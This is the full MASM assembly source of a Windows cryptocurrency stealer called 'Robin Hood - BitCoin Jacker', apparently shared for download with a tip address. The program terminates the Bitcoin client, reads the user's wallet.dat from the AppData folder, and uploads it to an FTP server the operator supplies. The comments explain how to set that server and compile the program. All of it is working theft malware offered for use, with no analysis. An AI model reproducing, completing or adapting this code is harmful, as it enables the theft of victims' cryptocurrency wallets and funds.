; ::Click Here Download Source Here:: ; Robin Hood - BitCoin Jacker ; by [ill]will ; steal from the rich and give to the poor ; by dumping the wallet to "public" ftp ; ; Send Me Money if it makes you rich :D ; 14P9t8ceqRzvJ4KhMWnjKQ4TwcLxWwk7j4 ; 'randomize' proc found somewhere on the net ; ftp.microsoft.com does not let you upload files ; so change the info and compile with MASM ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; include \masm32\include\masm32rt.inc include \masm32\include\wininet.inc includelib \masm32\lib\wininet.lib FTPit PROTO :DWORD,:DWORD,:DWORD KillMe PROTO :DWORD Randomize PROTO Random PROTO :DWORD ThePort equ 21 .data ftpsite db "ftp.microsoft.com",0 ;change the server Username db "anonymous",0 ;change the username Password db "[email protected]",0 ;change the password szTheVictim db "bitcoin.exe",0 RandWallet db "%s-wallet.dat",0 AppData db "AppData",0 wallet db "%s\Bitcoin\wallet.dat",0 random_seed dd ? res dd 0 sFmt db '%u',0 sBuf db 10 dup(0) .data? buffer db MAX_PATH dup(?) WalletPath db 256 dup(?) WalletFTP db 256 dup(?) szBuffer db 256 dup(?) .code start: invoke KillMe, addr szTheVictim ;kill the bitcoin process invoke Randomize ;generate a random number invoke Random,9999999 mov res,EAX invoke wsprintf,ADDR sBuf,ADDR sFmt,res ;append it to our ftp upload filename invoke wsprintf,addr WalletFTP,addr RandWallet, addr sBuf ;ex: 9586293-wallet.dat invoke GetEnvironmentVariable, addr AppData, addr buffer, sizeof buffer ;get the %AppDATA% folder invoke wsprintf,addr WalletPath,addr wallet, addr buffer ;append the bitcoin wallet invoke FTPit, addr ftpsite, addr WalletPath,addr WalletFTP ; send that shit to a public ftp invoke ExitProcess, 0 FTPit PROC FTPserver:DWORD, lpszFile:DWORD, lpRemoteFile:DWORD local hInternet:DWORD local ftpHandle:DWORD local context:DWORD local InternetStatusCallback:DWORD invoke InternetOpen,NULL,INTERNET_OPEN_TYPE_PRECONFIG,NULL,NULL,0 mov hInternet, eax invoke InternetConnect,hInternet,FTPserver,ThePort ,\ ;if different port change INTERNET_DEFAULT_FTP_PORT to port # ADDR Username,ADDR Password,INTERNET_SERVICE_FTP,\ INTERNET_FLAG_PASSIVE,ADDR context mov ftpHandle,eax invoke FtpPutFile,ftpHandle,lpszFile,lpRemoteFile,FTP_TRANSFER_TYPE_BINARY,NULL invoke InternetCloseHandle,ftpHandle invoke InternetCloseHandle, hInternet ret err: invoke GetErrDescription,eax ret FTPit endp Random proc dwBase:dword push ebx mov eax,dwBase xor ebx,ebx imul edx,random_seed,08088405h inc edx mov random_seed,edx mul edx mov eax,edx pop ebx ret Random endp Randomize proc invoke GetTickCount mov random_seed,eax ret Randomize endp KillMe proc szFile:dword LOCAL Process:PROCESSENTRY32 mov Process.dwSize, sizeof Process invoke CreateToolhelp32Snapshot, 2, 0 mov esi, eax invoke Process32First, esi, addr Process @@loop: invoke lstrcmpiA,szFile, addr Process.szExeFile test eax, eax jnz @@continue invoke OpenProcess, 0001h, 0, Process.th32ProcessID invoke TerminateProcess, eax, 0 @@continue: invoke Process32Next, esi, addr Process test eax, eax jz @@done jmp @@loop @@done: invoke CloseHandle, esi ret KillMe endp end start �